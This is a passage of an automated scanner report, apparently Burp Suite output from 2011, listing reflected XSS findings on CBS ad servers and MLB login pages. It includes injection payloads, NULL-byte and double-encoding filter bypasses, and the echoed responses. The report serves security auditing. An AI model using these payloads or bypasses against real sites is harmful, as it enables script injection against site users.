/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US18e97<a>24acc9741b7&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE: ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 23b18*/alert(1)//1007f56aa9 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:02:31 GMT Server: Apache/2.2 Content-Length: 1131 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:02:31 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US23b18*/alert(1)//1007f56aa9&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into the HTML document as plain text between tags. The payload 390bc<a>2cca7161cf2 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:01:55 GMT Server: Apache/2.2 Content-Length: 489 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:01:55 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c390bc<a>2cca7161cf2&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CI ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload 30f18*/alert(1)//36fc8e73e80 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:01:21 GMT Server: Apache/2.2 Content-Length: 1133 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:01:21 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c30f18*/alert(1)//36fc8e73e80&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 471e1<a>88535f3e092 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 22:59:45 GMT Server: Apache/2.2 Content-Length: 489 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 22:59:45 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS471e1<a>88535f3e092&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload bbb4e*/alert(1)//4de806e075b was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 22:59:44 GMT Server: Apache/2.2 Content-Length: 1092 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 22:59:44 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJSbbb4e*/alert(1)//4de806e075b&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.wri ...[SNIP]...
The value of the META&ADSEPARATOR request parameter is copied into the HTML document as plain text between tags. The payload %0029242<script>alert(1)</script>c7413a93569 was submitted in the META&ADSEPARATOR parameter. This input was echoed as 29242<script>alert(1)</script>c7413a93569 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:00:13 GMT Server: Apache/2.2 Content-Length: 1929 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:00:13 GMT
/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbs-pushdown",segmentId:"1815",rotatorId:"17584",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad --><img src=\"http://adlo ...[SNIP]... "0\" WIDTH=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" />"})/* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw2.cnet.com::1395308864 2011.10.02.23.00.13 *//* MAC T 0.1.3.4 */;.29242<script>alert(1)</script>c7413a93569/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"ads_magnet",segmentId:"1815",rotatorId:"20384",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad --> ...[SNIP]...
The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 5a2fc<a>2abc7cc0824 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:02:43 GMT Server: Apache/2.2 Content-Length: 507 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:02:43 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A5a2fc<a>2abc7cc0824&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:5a2fca2abc7cc0824:' CID='' ...[SNIP]...
The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload 75dfc*/alert(1)//0024477fb7b was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:01:53 GMT Server: Apache/2.2 Content-Length: 1139 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:01:53 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A75dfc*/alert(1)//0024477fb7b&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload 7f24f<a>386fcc1b106 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:03:08 GMT Server: Apache/2.2 Content-Length: 489 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:03:08 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=17f24f<a>386fcc1b106&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC ...[SNIP]...
The value of the NODE request parameter is copied into a JavaScript inline comment. The payload a87b4*/alert(1)//bad25590d00 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:02:09 GMT Server: Apache/2.2 Content-Length: 1117 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:02:09 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1a87b4*/alert(1)//bad25590d00&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload 7f52a*/alert(1)//77f952ac5d1 was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:00:17 GMT Server: Apache/2.2 Content-Length: 1144 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:00:17 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=7f52a*/alert(1)//77f952ac5d1&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85129'%3balert(1)//d06e92eeed was submitted in the PAGESTATE parameter. This input was echoed as 85129';alert(1)//d06e92eeed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:00:15 GMT Server: Apache/2.2 Content-Length: 1145 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:00:15 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=85129'%3balert(1)//d06e92eeed&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR ...[SNIP]... sion%253dc&ucat_rsi=%2526&pg=&t=2011.10.02.23.00.15/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />'); ;window.CBSI_PAGESTATE='85129';alert(1)//d06e92eeed';/* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw7.cnet.com::1776052544 2011.10.02.23.00.15 *//* MAC T 0.1.3.4 */
The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload 440d4<a>a86f0111d87 was submitted in the POS parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:03:07 GMT Server: Apache/2.2 Content-Length: 573 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:03:07 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100440d4<a>a86f0111d87&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='10' POS='100440d4aa86f0111d87' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO ...[SNIP]...
The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload 7134c<a>f75ef922c36 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:01:07 GMT Server: Apache/2.2 Content-Length: 506 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:01:07 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=20007134c<a>f75ef922c36&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' P ...[SNIP]...
The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload 12c80*/alert(1)//b5149415f30 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:00:57 GMT Server: Apache/2.2 Content-Length: 1117 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:00:57 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=200012c80*/alert(1)//b5149415f30&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload fa7c5<a>619528a5f81 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:00:22 GMT Server: Apache/2.2 Content-Length: 533 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:00:22 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164fa7c5<a>619528a5f81&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BRAND=&q ...[SNIP]...
The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload 8b61d<a>d3e1750ed63 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:03:32 GMT Server: Apache/2.2 Content-Length: 489 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:03:32 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=18b61d<a>d3e1750ed63&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907- ...[SNIP]...
The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 600d8*/alert(1)//748e5133e05 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:02:15 GMT Server: Apache/2.2 Content-Length: 1091 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:02:15 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1600d8*/alert(1)//748e5133e05&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
2.106. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://mads.cbs.com
Path:
/mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5daa3<a>6676c279d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:05:49 GMT Server: Apache/2.2 Content-Length: 493 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:05:49 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1&5daa3<a>6676c279d3d=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw11.cnet.com::1772648 ...[SNIP]...
2.107. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mads.cbs.com
Path:
/mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload c2d42*/alert(1)//dca1b90ae75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:03:51 GMT Server: Apache/2.2 Content-Length: 1094 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:03:51 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1&c2d42*/alert(1)//dca1b90ae75=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload bef97<a>6d51ff261c3 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:04:21 GMT Server: Apache/2.2 Content-Length: 489 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:04:21 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046bef97<a>6d51ff261c3&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1- ...[SNIP]...
The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload 8242a*/alert(1)//a2b812f71ef was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:02:37 GMT Server: Apache/2.2 Content-Length: 1091 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:02:37 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=783252448242a*/alert(1)//a2b812f71ef&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the successRedirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb13060bc01f was submitted in the successRedirect parameter. This input was echoed as 52427"><script>alert(1)</script>b13060bc01f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the successRedirect request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text/html;charset=ISO-8859-1 Content-Length: 6219 Cache-Control: max-age=7151 Expires: Mon, 03 Oct 2011 01:39:10 GMT Date: Sun, 02 Oct 2011 23:39:59 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Login</title> <meta http-equi ...[SNIP]... <input type="hidden" name="successRedirect" value="http://mlb.mlb.com/shared/account/v2/login_success.jsp?callback=l131759879149452427"><script>alert(1)</script>b13060bc01f" /> ...[SNIP]...
2.111. http://mlb.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mlb.mlb.com
Path:
/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12fe8"><script>alert(1)</script>fe0afe25a1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.jsp?12fe8"><script>alert(1)</script>fe0afe25a1a=1 HTTP/1.1 Host: mlb.mlb.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
